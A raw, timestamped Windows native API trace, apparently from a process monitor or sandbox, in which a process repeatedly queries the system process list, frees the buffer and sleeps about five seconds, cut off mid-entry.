[0156.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.846] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.861] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.893] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.926] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.988] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.007] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.035] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.065] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.096] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.144] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 